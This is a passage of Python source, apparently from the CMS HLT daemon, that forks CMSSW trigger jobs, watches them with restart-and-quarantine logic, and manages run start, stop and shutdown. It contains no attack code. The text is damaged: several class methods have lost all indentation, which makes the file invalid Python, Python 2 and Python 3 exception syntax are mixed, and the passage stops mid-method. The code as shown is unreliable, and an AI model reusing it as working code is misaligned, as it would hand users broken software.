        """Fork the CMSSW job (normal HLT or DQM variant) and attach a watchdog."""
        logger.debug("OnlineResource: StartNewProcess called")
        self.runnumber = runnumber
        """
        this is just a trick to be able to use two
        independent mounts of the BU - it should not be necessary in due course
        IFF it is necessary, it should address "any" number of mounts, not just 2
        """
        input_disk = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
        inputdirpath = os.path.join(input_disk,'run'+str(runnumber).zfill(conf.run_number_padding))
        #run_dir = input_disk + '/run' + str(self.runnumber).zfill(conf.run_number_padding)
        logger.info("starting process with "+version+" and run number "+str(runnumber)+ ' threads:'+str(num_threads)+' streams:'+str(num_streams))
        if "_patch" in version:
            full_release="cmssw-patch"
        else:
            full_release="cmssw"
        if not conf.dqm_machine:
            new_run_args = [conf.cmssw_script_location+'/startRun.sh',
                            conf.cmssw_base,
                            arch,
                            version,
                            conf.exec_directory,
                            full_release,
                            menu,
                            transfermode,
                            str(runnumber),
                            input_disk,
                            conf.watch_directory,
                            str(num_threads),
                            str(num_streams)]
        else: # a dqm machine
            dqm_globalrun_file = input_disk + '/' + dqm_globalrun_filepattern.format(str(runnumber).zfill(conf.run_number_padding))
            runkey = ''
            try:
                with open(dqm_globalrun_file, 'r') as f:
                    for line in f:
                        runkey = re.search(r'\s*run_key\s*=\s*([0-9A-Za-z_]*)', line, re.I)
                        if runkey:
                            runkey = runkey.group(1).lower()
                            break
            #consistency: modernized from 'except IOError,ex' to the 'as' form used
            #everywhere else in this file (identical semantics, py2.6+/py3 safe)
            except IOError as ex:
                logging.exception(ex)
                logging.info("the default run key will be used for the dqm jobs")
            new_run_args = [conf.cmssw_script_location+'/startDqmRun.sh',
                            conf.cmssw_base,
                            arch,
                            conf.exec_directory,
                            str(runnumber),
                            input_disk,
                            used+self.cpu[0]]
            if self.watchdog:
                #an existing watchdog means this is a restart: skip first lumis
                new_run_args.append('skipFirstLumis=True')
            if runkey:
                new_run_args.append('runkey={0}'.format(runkey))
            else:
                logging.info('Not able to determine the DQM run key from the "global" file. Default value from the input source will be used.')
        try:
            # dem = demote.demote(conf.user)
            self.process = subprocess.Popen(new_run_args,
                                            preexec_fn=preexec_function,
                                            close_fds=True
                                            )
            logger.info("arg array "+str(new_run_args).translate(None, "'")+' started with pid '+str(self.process.pid))
            # time.sleep(1.)
            if self.watchdog==None:
                self.processstate = 100
                self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
                self.watchdog.start()
                logger.debug("watchdog thread for "+str(self.process.pid)+" is alive "
                             + str(self.watchdog.is_alive()))
            else:
                #release lock while joining thread to let it complete
                resource_lock.release()
                self.watchdog.join()
                resource_lock.acquire()
                self.processstate = 100
                self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
                self.watchdog.start()
                logger.debug("watchdog thread restarted for "+str(self.process.pid)+" is alive "
                             + str(self.watchdog.is_alive()))
        except Exception as ex:
            logger.info("OnlineResource: exception encountered in forking hlt slave")
            logger.info(ex)
    def join(self):
        """Wait for the watchdog (and thus the child process) to finish."""
        logger.debug('calling join on thread ' +self.watchdog.name)
        self.watchdog.join()
    def clearQuarantined(self,doLock=True,restore=True):
        """Return quarantined cores to the idle pool (restore=True) or hand
        them to the global q_list (restore=False); returns the cores handled."""
        global q_list
        retq=[]
        if not restore:
            q_list+=self.quarantined
            return self.quarantined
        if doLock:resource_lock.acquire()
        try:
            for cpu in self.quarantined:
                logger.info('Clearing quarantined resource '+cpu)
                os.rename(quarantined+cpu,idles+cpu)
                retq.append(cpu)
            self.quarantined = []
            self.parent.n_used=0
            self.parent.n_quarantined=0
        except Exception as ex:
            logger.exception(ex)
        if doLock:resource_lock.release()
        return retq
class ProcessWatchdog(threading.Thread):
    """Thread that waits on one cmsRun child process and handles its exit.

    On abnormal exit it restarts the job on the same resource (up to
    conf.process_restart_limit times, after conf.process_restart_delay_sec) or
    quarantines the cores; on clean exit it triggers end-of-run handling and
    returns the cores to the idle pool.
    """
    def __init__(self,resource,lock,inputdirpath):
        threading.Thread.__init__(self)
        self.resource = resource          # the OnlineResource being watched
        self.lock = lock
        self.inputdirpath=inputdirpath    # ramdisk run directory for this run
        self.retry_limit = conf.process_restart_limit
        self.retry_delay = conf.process_restart_delay_sec
        self.quarantined = False
    def run(self):
        try:
            logger.info('watchdog thread for process '+str(self.resource.process.pid) + ' on resource '+str(self.resource.cpu)+" for run "+str(self.resource.runnumber) + ' started ')
            #block until the child process exits
            self.resource.process.wait()
            returncode = self.resource.process.returncode
            pid = self.resource.process.pid
            #update json process monitoring file
            self.resource.processstate=returncode
            outdir = self.resource.assigned_run_dir
            abortedmarker = os.path.join(outdir,Run.ABORTED)
            stoppingmarker = os.path.join(outdir,Run.STOPPING)
            abortcompletemarker = os.path.join(outdir,Run.ABORTCOMPLETE)
            completemarker = os.path.join(outdir,Run.COMPLETE)
            rnsuffix = str(self.resource.runnumber).zfill(conf.run_number_padding)
            #aborted run: just hand the cores back and quit
            if os.path.exists(abortedmarker):
                resource_lock.acquire()
                #release resources
                try:
                    for cpu in self.resource.cpu:
                        try:
                            os.rename(used+cpu,idles+cpu)
                            self.resource.parent.n_used-=1
                        except Exception as ex:
                            logger.exception(ex)
                except:pass
                resource_lock.release()
                return
            #input dir check if cmsRun can not find the input
            inputdir_exists = os.path.exists(self.inputdirpath)
            #exit code 90 with no input dir means the run vanished, not a config error
            configuration_reachable = False if conf.dqm_machine==False and returncode==90 and not inputdir_exists else True
            if conf.dqm_machine==False and returncode==90 and inputdir_exists:
                if not os.path.exists(os.path.join(self.inputdirpath,'hlt','HltConfig.py')):
                    logger.error("input run dir exists, but " + str(os.path.join(self.inputdirpath,'hlt','HltConfig.py')) + " is not present (cmsRun exit code 90)")
                    configuration_reachable=False
            #cleanup actions- remove process from list and attempt restart on same resource
            if returncode != 0 and returncode!=None and configuration_reachable:
                #bump error count in active_runs_errors which is logged in the box file
                self.resource.parent.num_errors+=1
                if returncode < 0:
                    #negative returncode == terminated by signal -returncode
                    logger.error("process "+str(pid)
                                 +" for run "+str(self.resource.runnumber)
                                 +" on resource(s) " + str(self.resource.cpu)
                                 +" exited with signal "
                                 +str(returncode) + ', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
                                 )
                else:
                    logger.error("process "+str(pid)
                                 +" for run "+str(self.resource.runnumber)
                                 +" on resource(s) " + str(self.resource.cpu)
                                 +" exited with code "
                                 +str(returncode) +', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
                                 )
                #quit codes (configuration errors):
                quit_codes = [127,90,73]
                #removed 65 because it is not only configuration error
                #quit_codes = [127,90,65,73]
                #dqm mode will treat configuration error as a crash and eventually move to quarantined
                if conf.dqm_machine==False and returncode in quit_codes:
                    if self.resource.retry_attempts < self.retry_limit:
                        logger.warning('for this type of error, restarting this process is disabled')
                        self.resource.retry_attempts=self.retry_limit
                    if returncode==127:
                        logger.fatal('Exit code indicates that CMSSW environment might not be available (cmsRun executable not in path).')
                    elif returncode==90:
                        logger.fatal('Exit code indicates that there might be a python error in the CMSSW configuration.')
                    else:
                        logger.fatal('Exit code indicates that there might be a C/C++ error in the CMSSW configuration.')
                #generate crashed pid json file like: run000001_ls0000_crash_pid12345.jsn
                oldpid = "pid"+str(pid).zfill(5)
                runnumber = "run"+str(self.resource.runnumber).zfill(conf.run_number_padding)
                ls = "ls0000"
                filename = "_".join([runnumber,ls,"crash",oldpid])+".jsn"
                filepath = os.path.join(outdir,filename)
                document = {"errorCode":returncode}
                try:
                    with open(filepath,"w+") as fi:
                        json.dump(document,fi)
                except: logger.exception("unable to create %r" %filename)
                logger.info("pid crash file: %r" %filename)
                if self.resource.retry_attempts < self.retry_limit:
                    """
                    sleep a configurable amount of seconds before
                    trying a restart. This is to avoid 'crash storms'
                    """
                    time.sleep(self.retry_delay)
                    self.resource.process = None
                    self.resource.retry_attempts += 1
                    logger.info("try to restart process for resource(s) "
                                +str(self.resource.cpu)
                                +" attempt "
                                + str(self.resource.retry_attempts))
                    #moving to 'broken' triggers the restart machinery elsewhere
                    resource_lock.acquire()
                    for cpu in self.resource.cpu:
                        os.rename(used+cpu,broken+cpu)
                        self.resource.parent.n_used-=1
                    resource_lock.release()
                    logger.debug("resource(s) " +str(self.resource.cpu)+
                                 " successfully moved to except")
                elif self.resource.retry_attempts >= self.retry_limit:
                    logger.info("process for run "
                                +str(self.resource.runnumber)
                                +" on resources " + str(self.resource.cpu)
                                +" reached max retry limit "
                                )
                    resource_lock.acquire()
                    for cpu in self.resource.cpu:
                        os.rename(used+cpu,quarantined+cpu)
                        self.resource.quarantined.append(cpu)
                        self.resource.parent.n_quarantined+=1
                    resource_lock.release()
                    self.quarantined=True
                    #write quarantined marker for RunRanger
                    try:
                        os.remove(conf.watch_directory+'/quarantined'+rnsuffix)
                    except:
                        pass
                    try:
                        with open(conf.watch_directory+'/quarantined'+rnsuffix,'w+') as fp:
                            pass
                    except Exception as ex:
                        logger.exception(ex)
            #successful end= release resource (TODO:maybe should mark aborted for non-0 error codes)
            elif returncode == 0 or returncode == None or not configuration_reachable:
                if not configuration_reachable:
                    logger.info('pid '+str(pid)+' exit 90 (input directory and menu missing) from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
                else:
                    logger.info('pid '+str(pid)+' exit 0 from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
                # generate an end-of-run marker if it isn't already there - it will be picked up by the RunRanger
                endmarker = conf.watch_directory+'/end'+rnsuffix
                if not os.path.exists(endmarker):
                    with open(endmarker,'w+') as fp:
                        pass
                count=0
                # wait until the request to end has been handled
                while not os.path.exists(stoppingmarker):
                    if os.path.exists(completemarker):
                        break
                    if os.path.exists(abortedmarker) or os.path.exists(abortcompletemarker):
                        logger.warning('quitting watchdog thread because run ' + str(self.resource.runnumber) + ' has been aborted ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
                        break
                    if not os.path.exists(outdir):
                        logger.warning('quitting watchdog thread because run directory ' + outdir + ' has disappeared ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
                        break
                    time.sleep(.1)
                    count+=1
                    if count>=100 and count%100==0:
                        logger.warning("still waiting for complete marker for run "+str(self.resource.runnumber) + ' in watchdog for resource '+str(self.resource.cpu))
                # move back the resource now that it's safe since the run is marked as ended
                resource_lock.acquire()
                for cpu in self.resource.cpu:
                    try:
                        os.rename(used+cpu,idles+cpu)
                    except Exception as ex:
                        logger.warning('problem moving core ' + cpu + ' from used to idle:'+str(ex))
                resource_lock.release()
            #logger.info('exiting watchdog thread for '+str(self.resource.cpu))
        except Exception as ex:
            logger.info("OnlineResource watchdog: exception")
            logger.exception(ex)
            #make sure the lock is not left held on an unexpected error path
            try:resource_lock.release()
            except:pass
        return
class Run:
    """Represents one data-taking run handled by this hltd instance."""
    #names of the lifecycle marker files dropped in the run directory
    STARTING = 'starting'
    ACTIVE = 'active'
    STOPPING = 'stopping'
    ABORTED = 'aborted'
    COMPLETE = 'complete'
    ABORTCOMPLETE = 'abortcomplete'
    VALID_MARKERS = [STARTING,ACTIVE,STOPPING,COMPLETE,ABORTED,ABORTCOMPLETE]
    def __init__(self,nr,dirname,bu_dir,instance):
        """Initialize run state; on the FU poll for the HLT menu/parameter
        files on the BU ramdisk, then launch the elastic/anelastic helper
        processes as configured."""
        self.pending_shutdown=False
        self.is_ongoing_run=True
        self.num_errors = 0
        self.instance = instance
        self.runnumber = nr
        self.dirname = dirname
        self.online_resource_list = []
        self.anelastic_monitor = None
        self.elastic_monitor = None
        self.elastic_test = None
        self.arch = None
        self.version = None
        self.transfermode = None
        self.waitForEndThread = None
        self.beginTime = datetime.datetime.now()
        self.anelasticWatchdog = None
        self.elasticBUWatchdog = None
        self.completedChecker = None
        self.runShutdown = None
        self.threadEvent = threading.Event()
        self.stopThreads = False
        #stats on usage of resources
        self.n_used = 0
        self.n_quarantined = 0
        self.inputdir_exists = False
        if conf.role == 'fu':
            self.changeMarkerMaybe(Run.STARTING)
        #TODO:raise from runList
        # if int(self.runnumber) in active_runs:
        #     raise Exception("Run "+str(self.runnumber)+ "already active")
        self.hlt_directory = os.path.join(bu_dir,conf.menu_directory)
        self.menu_path = os.path.join(self.hlt_directory,conf.menu_name)
        self.paramfile_path = os.path.join(self.hlt_directory,conf.paramfile_name)
        readMenuAttempts=0
        #polling for HLT menu directory
        def paramsPresent():
            #true when menu dir, menu and parameter file are all present
            return os.path.exists(self.hlt_directory) and os.path.exists(self.menu_path) and os.path.exists(self.paramfile_path)
        paramsDetected = False
        #poll up to ~5s (50 x 0.1s) for the FFF parameter file on the ramdisk
        while conf.dqm_machine==False and conf.role=='fu':
            if paramsPresent():
                try:
                    with open(self.paramfile_path,'r') as fp:
                        fffparams = json.load(fp)
                    self.arch = fffparams['SCRAM_ARCH']
                    self.version = fffparams['CMSSW_VERSION']
                    self.transfermode = fffparams['TRANSFER_MODE']
                    paramsDetected = True
                    logger.info("Run " + str(self.runnumber) + " uses " + self.version + " ("+self.arch + ") with " + str(conf.menu_name) + ' transferDest:'+self.transfermode)
                    break
                except ValueError as ex:
                    #file may still be in the process of being written; retry
                    if readMenuAttempts>50:
                        logger.exception(ex)
                        break
                except Exception as ex:
                    if readMenuAttempts>50:
                        logger.exception(ex)
                        break
            else:
                if readMenuAttempts>50:
                    if not os.path.exists(bu_dir):
                        logger.info("FFF parameter or HLT menu files not found in ramdisk - BU run directory is gone")
                    else:
                        logger.error("FFF parameter or HLT menu files not found in ramdisk")
                    break
            readMenuAttempts+=1
            time.sleep(.1)
            continue
        if not paramsDetected:
            #fall back to configured defaults when no parameter file was found
            self.arch = conf.cmssw_arch
            self.version = conf.cmssw_default_version
            self.menu_path = conf.test_hlt_config1
            self.transfermode = 'null'
            if conf.role=='fu':
                logger.warning("Using default values for run " + str(self.runnumber) + ": " + self.version + " (" + self.arch + ") with " + self.menu_path)
        #give this command line parameter quoted in case it is empty
        if len(self.transfermode)==0:
            self.transfermode='null'
        #backup HLT menu and parameters
        if conf.role=='fu':
            try:
                hltTargetName = 'HltConfig.py_run'+str(self.runnumber)+'_'+self.arch+'_'+self.version+'_'+self.transfermode
                shutil.copy(self.menu_path,os.path.join(conf.log_dir,'pid',hltTargetName))
            except:
                logger.warning('Unable to backup HLT menu')
        self.rawinputdir = None
        #
        if conf.role == "bu":
            try:
                self.rawinputdir = conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
                os.stat(self.rawinputdir)
                self.inputdir_exists = True
            except Exception, ex:
                logger.error("failed to stat "+self.rawinputdir)
            try:
                os.mkdir(self.rawinputdir+'/mon')
            except Exception, ex:
                logger.error("could not create mon dir inside the run input directory")
        else:
            self.rawinputdir= os.path.join(bu_disk_list_ramdisk_instance[0],'run' + str(self.runnumber).zfill(conf.run_number_padding))
        #verify existence of the input directory
        if conf.role=='fu':
            if not paramsDetected and conf.dqm_machine==False:
                try:
                    os.stat(self.rawinputdir)
                    self.inputdir_exists = True
                except:
                    #abort construction early: no parameters and no input directory
                    logger.warning("unable to stat raw input directory for run "+str(self.runnumber))
                    return
            else:
                self.inputdir_exists = True
        self.lock = threading.Lock()
        if conf.use_elasticsearch == True:
            global nsslock
            try:
                if conf.role == "bu":
                    nsslock.acquire()
                    logger.info("starting elasticbu.py with arguments:"+self.dirname)
                    elastic_args = ['/opt/hltd/python/elasticbu.py',self.instance,str(self.runnumber)]
                else:
                    logger.info("starting elastic.py with arguments:"+self.dirname)
                    elastic_args = ['/opt/hltd/python/elastic.py',self.dirname,self.rawinputdir+'/mon',str(expected_processes)]
                self.elastic_monitor = subprocess.Popen(elastic_args,
                                                        preexec_fn=preexec_function,
                                                        close_fds=True
                                                        )
            except OSError as ex:
                logger.error("failed to start elasticsearch client")
                logger.error(ex)
                #don't hold the nss lock if the fork failed
                try:nsslock.release()
                except:pass
        if conf.role == "fu" and conf.dqm_machine==False:
            try:
                logger.info("starting anelastic.py with arguments:"+self.dirname)
                elastic_args = ['/opt/hltd/python/anelastic.py',self.dirname,str(self.runnumber), self.rawinputdir,bu_disk_list_output_instance[0]]
                self.anelastic_monitor = subprocess.Popen(elastic_args,
                                                          preexec_fn=preexec_function,
                                                          close_fds=True
                                                          )
            except OSError as ex:
                #anelastic.py is essential on a FU; give up if it cannot start
                logger.fatal("failed to start anelastic.py client:")
                logger.exception(ex)
                sys.exit(1)
def __del__(self):
self.stopThreads=True
self.threadEvent.set()
if self.completedChecker:
try:
self.completedChecker.join()
except RuntimeError:
pass
if self.elasticBUWatchdog:
try:
self.elasticBUWatchdog.join()
except RuntimeError:
pass
if self.runShutdown:
self.joinShutdown()
logger.info('Run '+ str(self.runnumber) +' object __del__ has completed')
def countOwnedResourcesFrom(self,resourcelist):
ret = 0
try:
for p in self.online_resource_list:
for c in p.cpu:
for resourcename in resourcelist:
if resourcename == c:
ret+=1
except:pass
return ret
    def AcquireResource(self,resourcenames,fromstate):
        """Move the given core files from 'fromstate' to 'used' and return the
        (new or existing) OnlineResource grouping them.

        Note: 'idles' here is a local path prefix built from fromstate, shadowing
        the module-level 'idles'. Relies on py2 filter() returning a list.
        """
        idles = conf.resource_base+'/'+fromstate+'/'
        try:
            logger.debug("Trying to acquire resource "
                         +str(resourcenames)
                         +" from "+fromstate)
            for resourcename in resourcenames:
                os.rename(idles+resourcename,used+resourcename)
                self.n_used+=1
            #TODO:fix core pairing with resource.cpu list (otherwise - restarting will not work properly)
            if not filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list):
                logger.debug("resource(s) "+str(resourcenames)
                             +" not found in online_resource_list, creating new")
                self.online_resource_list.append(OnlineResource(self,resourcenames,self.lock))
                return self.online_resource_list[-1]
            logger.debug("resource(s) "+str(resourcenames)
                         +" found in online_resource_list")
            return filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list)[0]
        except Exception as ex:
            logger.info("exception encountered in looking for resources")
            logger.info(ex)
def MatchResource(self,resourcenames):
for res in self.online_resource_list:
#first resource in the list is the one that triggered inotify event
if resourcenames[0] in res.cpu:
found_all = True
for name in res.cpu:
if name not in resourcenames:
found_all = False
if found_all:
return res.cpu
return None
def ContactResource(self,resourcename):
self.online_resource_list.append(OnlineResource(self,resourcename,self.lock))
self.online_resource_list[-1].ping() #@@MO this is not doing anything useful, afaikt
    def ReleaseResource(self,res):
        #drop the resource from the tracked list (state files handled by caller)
        self.online_resource_list.remove(res)
    def AcquireResources(self,mode):
        """Scan the resource directory and claim resources for this run.

        FU: groups 'nstreams' idle core files into one OnlineResource each.
        BU: registers recently-updated, non-blacklisted, non-stale FU box files.
        Always returns True.
        """
        logger.info("acquiring resources from "+conf.resource_base)
        idles = conf.resource_base
        idles += '/idle/' if conf.role == 'fu' else '/boxes/'
        try:
            dirlist = os.listdir(idles)
        except Exception as ex:
            logger.info("exception encountered in looking for resources")
            logger.info(ex)
        #NOTE(review): if the listdir above failed, dirlist is unbound here -> NameError
        logger.info(str(dirlist))
        current_time = time.time()
        count = 0
        cpu_group=[]
        #self.lock.acquire()
        global machine_blacklist
        bldir = os.path.join(self.dirname,'hlt')
        blpath = os.path.join(self.dirname,'hlt','blacklist')
        if conf.role=='bu':
            #wait up to ~5s (100 x 0.05s) for the run's hlt directory to appear
            attempts=100
            while not os.path.exists(bldir) and attempts>0:
                time.sleep(0.05)
                attempts-=1
                if attempts<=0:
                    logger.error('Timeout waiting for directory '+ bldir)
                    break
            if os.path.exists(blpath):
                update_success,machine_blacklist=updateBlacklist(blpath)
            else:
                logger.error("unable to find blacklist file in "+bldir)
        for cpu in dirlist:
            #skip self
            if conf.role=='bu':
                if cpu == os.uname()[1]:continue
                if cpu in machine_blacklist:
                    logger.info("skipping blacklisted resource "+str(cpu))
                    continue
                if self.checkStaleResourceFile(idles+cpu):
                    logger.error("Skipping stale resource "+str(cpu))
                    continue
            count = count+1
            try:
                age = current_time - os.path.getmtime(idles+cpu)
                cpu_group.append(cpu)
                if conf.role == 'fu':
                    #claim cores in groups of nstreams
                    if count == nstreams:
                        self.AcquireResource(cpu_group,'idle')
                        cpu_group=[]
                        count=0
                else:
                    logger.info("found resource "+cpu+" which is "+str(age)+" seconds old")
                    #only box files refreshed within the last 10s are considered alive
                    if age < 10:
                        cpus = [cpu]
                        self.ContactResource(cpus)
            except Exception as ex:
                logger.error('encountered exception in acquiring resource '+str(cpu)+':'+str(ex))
        return True
        #self.lock.release()
def checkStaleResourceFile(self,resourcepath):
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
time.sleep(.05)
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
logger.warning('can not parse ' + str(resourcepath))
return False
    def CheckTemplate(self):
        # BU only: make sure the elasticsearch run-appliance template is in
        # place before the run starts; failures are logged, not fatal.
        if conf.role=='bu' and conf.use_elasticsearch:
            logger.info("checking ES template")
            try:
                setupES(forceReplicas=conf.force_replicas)
            except Exception as ex:
                logger.error("Unable to check run appliance template:"+str(ex))
    def Start(self):
        """Begin the run on all acquired resources.

        FU: forks one CMSSW process per resource, marks the run ACTIVE and
        starts the anelastic.py watchdog (unless this is a DQM machine).
        BU: notifies each FU appliance of the new run, records the begin
        time, then starts the elasticbu watchdog and the completion checker.
        """
        self.is_ongoing_run = True
        #create mon subdirectory before starting
        try:
            os.makedirs(os.path.join(self.dirname,'mon'))
        except OSError:
            # directory may already exist
            pass
        #start/notify run for each resource
        if conf.role == 'fu':
            for resource in self.online_resource_list:
                logger.info('start run '+str(self.runnumber)+' on cpu(s) '+str(resource.cpu))
                self.StartOnResource(resource)
            if conf.dqm_machine==False:
                self.changeMarkerMaybe(Run.ACTIVE)
                #start safeguard monitoring of anelastic.py
                self.startAnelasticWatchdog()
        elif conf.role == 'bu':
            # two-phase notification: start on all, then join all
            for resource in self.online_resource_list:
                logger.info('start run '+str(self.runnumber)+' on resources '+str(resource.cpu))
                resource.NotifyNewRunStart(self.runnumber)
            #update begin time at this point
            self.beginTime = datetime.datetime.now()
            for resource in self.online_resource_list:
                resource.NotifyNewRunJoin()
            logger.info('sent start run '+str(self.runnumber)+' notification to all resources')
            self.startElasticBUWatchdog()
            self.startCompletedChecker()
def maybeNotifyNewRun(self,resourcename,resourceage):
if conf.role=='fu':
logger.fatal('this function should *never* have been called when role == fu')
return
if self.rawinputdir != None:
#TODO:check also for EoR file?
try:
os.stat(self.rawinputdir)
except:
logger.warning('Unable to find raw directory of '+str(self.runnumber))
return None
for resource in self.online_resource_list:
if resourcename in resource.cpu:
logger.error('Resource '+str(resource.cpu)+' was already processing run ' + str(self.runnumber) + '. Will not participate in this run.')
return None
if resourcename in machine_blacklist:
logger.info("skipping blacklisted resource "+str(resource.cpu))
return None
current_time = time.time()
age = current_time - resourceage
logger.info("found resource "+resourcename+" which is "+str(age)+" seconds old")
if age < 10:
self.ContactResource([resourcename])
return self.online_resource_list[-1]
else:
return None
    def StartOnResource(self, resource):
        """Assign the run directory to *resource* and fork its CMSSW process.

        Thread count is scaled by the number of cores the resource owns
        (nthreads/nstreams are module-level settings).
        """
        logger.debug("StartOnResource called")
        resource.assigned_run_dir=conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
        resource.StartNewProcess(self.runnumber,
                                 self.online_resource_list.index(resource),
                                 self.arch,
                                 self.version,
                                 self.menu_path,
                                 self.transfermode,
                                 int(round((len(resource.cpu)*float(nthreads)/nstreams))),
                                 len(resource.cpu))
        logger.debug("StartOnResource process started")
    def Stop(self):
        """Request a graceful CMSSW stop.

        Writes a JSON stop document with the lumisection at which jobs should
        finish (last closed LS on the BU ramdisk + a small delay), first to a
        temp file and then atomically renamed to CMSSW_STOP.
        """
        #used to gracefully stop CMSSW and finish scripts
        with open(os.path.join(self.dirname,"temp_CMSSW_STOP"),'w') as f:
            writedoc = {}
            bu_lumis = []
            try:
                bu_eols_files = filter( lambda x: x.endswith("_EoLS.jsn"),os.listdir(self.rawinputdir))
                bu_lumis = (sorted([int(x.split('_')[1][2:]) for x in bu_eols_files]))
            except:
                logger.error("Unable to parse BU EoLS files")
            # close a few lumisections after the last known closed one
            ls_delay=3
            if len(bu_lumis):
                logger.info('last closed lumisection in ramdisk is '+str(bu_lumis[-1])+', requesting to close at LS '+ str(bu_lumis[-1]+ls_delay))
                writedoc['lastLS']=bu_lumis[-1]+ls_delay #current+delay
            else: writedoc['lastLS']=ls_delay
            json.dump(writedoc,f)
        try:
            os.rename(os.path.join(self.dirname,"temp_CMSSW_STOP"),os.path.join(self.dirname,"CMSSW_STOP"))
        except:pass
def startShutdown(self,killJobs=False,killScripts=False):
self.runShutdown = threading.Thread(target = self.Shutdown,args=[killJobs,killScripts])
self.runShutdown.start()
def joinShutdown(self):
if self.runShutdown:
try:
self.runShutdown.join()
except:
return
    def Shutdown(self,killJobs=False,killScripts=False):
        """Tear down the run: stop CMSSW processes, return resources to the
        idle pool and terminate the helper scripts.

        killJobs -- SIGKILL the CMSSW processes instead of SIGTERM.
        killScripts -- also terminate anelastic.py / elastic.py monitors.
        """
        #herod mode sends sigkill to all process, however waits for all scripts to finish
        logger.info("run"+str(self.runnumber)+": Shutdown called")
        self.pending_shutdown=False
        self.is_ongoing_run = False
        try:
            self.changeMarkerMaybe(Run.ABORTED)
        except OSError as ex:
            pass
        time.sleep(.1)
        try:
            # phase 1: stop running CMSSW processes (state 100 == running)
            for resource in self.online_resource_list:
                if resource.processstate==100:
                    logger.info('terminating process '+str(resource.process.pid)+
                                ' in state '+str(resource.processstate)+' owning '+str(resource.cpu))
                    if killJobs:resource.process.kill()
                    else:resource.process.terminate()
                    if resource.watchdog!=None and resource.watchdog.is_alive():
                        try:
                            resource.join()
                        except:
                            pass
                    logger.info('process '+str(resource.process.pid)+' terminated')
                time.sleep(.1)
                logger.info(' releasing resource(s) '+str(resource.cpu))
            # phase 2: move per-core resource files back to idle under the lock;
            # 'used' and 'idles' are module-level resource directory prefixes
            resource_lock.acquire()
            q_clear_condition = (not self.checkQuarantinedLimit()) or conf.auto_clear_quarantined
            for resource in self.online_resource_list:
                cleared_q = resource.clearQuarantined(doLock=False,restore=q_clear_condition)
                for cpu in resource.cpu:
                    if cpu not in cleared_q:
                        try:
                            os.rename(used+cpu,idles+cpu)
                            self.n_used-=1
                        except OSError:
                            #@SM:can happen if it was quarantined
                            logger.warning('Unable to find resource '+used+cpu)
                        except Exception as ex:
                            # never leave the lock held on an unexpected error
                            resource_lock.release()
                            raise(ex)
                resource.process=None
            resource_lock.release()
            logger.info('completed clearing resource list')
            self.online_resource_list = []
            try:
                self.changeMarkerMaybe(Run.ABORTCOMPLETE)
            except OSError as ex:
                pass
            # phase 3: stop monitoring scripts
            try:
                if self.anelastic_monitor:
                    if killScripts:
                        self.anelastic_monitor.terminate()
                    self.anelastic_monitor.wait()
            except OSError as ex:
                if ex.errno==3:
                    # ESRCH: process already gone
                    logger.info("anelastic.py for run " + str(self.runnumber) + " is not running")
            except Exception as ex:
                logger.exception(ex)
            if conf.use_elasticsearch == True:
                try:
                    if self.elastic_monitor:
                        if killScripts:
                            self.elastic_monitor.terminate()
                        #allow monitoring thread to finish, but no more than 30 seconds after others
                        killtimer = threading.Timer(30., self.elastic_monitor.kill)
                        try:
                            killtimer.start()
                            self.elastic_monitor.wait()
                        finally:
                            killtimer.cancel()
                        try:self.elastic_monitor=None
                        except:pass
                except OSError as ex:
                    if ex.errno==3:
                        logger.info("elastic.py for run " + str(self.runnumber) + " is not running")
                    else :logger.exception(ex)
                except Exception as ex:
                    logger.exception(ex)
            if self.waitForEndThread is not None:
                self.waitForEndThread.join()
        except Exception as ex:
            logger.info("exception encountered in shutting down resources")
            logger.exception(ex)
        # finally drop the run from the global run list
        resource_lock.acquire()
        try:
            runList.remove(self.runnumber)
        except Exception as ex:
            logger.exception(ex)
        resource_lock.release()
        try:
            if conf.delete_run_dir is not None and conf.delete_run_dir == True:
                shutil.rmtree(conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding))
            os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
        except:
            pass
        logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' completed')
    def ShutdownBU(self):
        """BU-side teardown: stop elasticbu.py (if still alive) and drop the
        run from the global run list."""
        self.is_ongoing_run = False
        try:
            if self.elastic_monitor:
                #first check if process is alive
                if self.elastic_monitor.poll() is None:
                    self.elastic_monitor.terminate()
                    time.sleep(.1)
        except Exception as ex:
            logger.info("exception encountered in shutting down elasticbu.py: " + str(ex))
            #logger.exception(ex)
        #should also trigger destructor of the Run
        resource_lock.acquire()
        try:
            runList.remove(self.runnumber)
        except Exception as ex:
            logger.exception(ex)
        resource_lock.release()
        logger.info('Shutdown of run '+str(self.runnumber).zfill(conf.run_number_padding)+' on BU completed')
def StartWaitForEnd(self):
self.is_ongoing_run = False
self.changeMarkerMaybe(Run.STOPPING)
try:
self.waitForEndThread = threading.Thread(target = self.WaitForEnd)
self.waitForEndThread.start()
except Exception as ex:
logger.info("exception encountered in starting run end thread")
logger.info(ex)
    def WaitForEnd(self):
        """Thread body: wait for all processes of this run to finish, clean
        up, drop the run from the global list and — when in cloud mode and no
        other run is active — hand the resources to the cloud."""
        logger.info("wait for end thread!")
        global cloud_mode
        global entering_cloud_mode
        global abort_cloud_mode
        try:
            # wait for every per-resource process to complete
            for resource in self.online_resource_list:
                if resource.processstate is not None:
                    if resource.process is not None and resource.process.pid is not None: ppid = resource.process.pid
                    else: ppid="None"
                    logger.info('waiting for process '+str(ppid)+
                                ' in state '+str(resource.processstate) +
                                ' to complete ')
                    try:
                        resource.join()
